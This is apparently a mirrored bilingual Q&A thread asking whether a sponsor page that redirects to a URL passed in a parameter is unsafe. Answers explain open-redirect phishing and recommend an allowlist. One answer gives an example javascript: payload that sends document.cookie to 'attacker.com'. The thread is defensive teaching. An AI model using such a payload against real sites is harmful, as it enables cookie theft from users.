您能在这里找到网络安全问题吗?

发布于 2024-07-08 00:03:58 字数 288 浏览 10 评论 0原文

我有一个重定向到另一个网页的网页,如下所示:

http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html

然后 Sponsor.php 页面会显示一个广告,其中包含一个链接,其中显示“继续您的页面”,该链接链接到传入的 RedirectPage。 是否存在由此产生的安全/欺骗问题? 处理这个问题的最佳方法是什么? (请注意,用户未登录任何一个站点)

I have a webpage that redirects to another webpage like this:

http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html

Then the Sponsor.php page displays an ad with a link saying "Continue to your page" that links to the passed in RedirectPage. Are there security/spoofing issues that could come from this? What is the best way to handle this? (note that the user is not logged in to either site)

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(3

折戟 2024-07-15 00:03:58

这是一个大问题。 如果我向您发送一个如下所示的链接:

 http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14

您会想“哦,CNN,这是一个合法网站”,然后您将打开它并单击“继续您的页面”链接。 然后你就会进入网络上最恶心的色情网站之一,它会以巨大的洪亮男声向你所有的同事宣布“该死的我想要!@$@#$ 你的! (&¤&^$§ 直到我不能 ¡⌐^(!#~~&$^#!@$!!" 并且你必须向你的老板解释"我以为这是 CNN!”

这里的漏洞是您的声誉。像这样的盲目重定向是危险的。

而这只是一个漏洞。这样怎么样?

 http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie

现在我已经对您的网站进行了 XSS 攻击并窃取了您用户的 cookie当然,您说没有登录信息,但是会话数据怎么样?或者当您稍后添加登录信息时,或者您公司中的其他人在用户登录后使用此页面。

It's a big problem. If I send you a link that looks like this:

 http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14

You're going to think "Oh, CNN, that's a legit site", and you'll open it and click the 'Continue to Your Page' link. And then you'll be on one of the nastiest porn sites on the net and it'll have a giant booming male voice announcing to all your co-workers "Hot Damn I Want to !@$@#$ Your !(&¤&^$§ until I can't ¡⌐^(!#~~&$^#!@$!!" and you'll have to explain to your boss "I thought it was CNN!"

The hole here is your reputation. Blind redirects like this are dangerous.

And that's just one hole. How about this?

 http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie

Now I've XSS-ed your site and stolen your user's cookies. Sure, you say there's no login info, but how about session data? Or when you add a login later, or someone else in your company uses this page a year later where users are logged in.

初吻给了烟 2024-07-15 00:03:58

这绝对是一个安全风险。 当涉及安全时,您应该避免使用 URL 内变量。

虽然没有什么是完全安全的,但这是处理此问题的更好方法: http://www .webmasterworld.com/forum88/2910.htm

This is definitely a security risk. You should avoid using in-URL variables when security is involved.

While nothing is totally secure, this is a much better way of handling this issue: http://www.webmasterworld.com/forum88/2910.htm

白云不回头 2024-07-15 00:03:58

如果sponsor.php允许任何值进入RedirectPage并且广告暗示认可,或者鼓励人们认为他们走在正确的轨道上,那么您将打开它作为网络钓鱼攻击的一部分。 更糟糕的是,您可能会从这些攻击中获利,这可能会让人们相当不满。

保留允许的 URL(或它们可以遵循的模式)的列表将大大有助于防止出现问题。

If sponsor.php allows any value into RedirectPage AND ads imply an endorsement, or encourage people to think that they are on the right track you would be opening it to be part of a phishing attack. What's worse, you would probably be profiting from those attacks, which would likely make people rather displeased.

Keeping a list of permitted URLs (or patterns that they can follow) would go a long way to prevent problems.

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文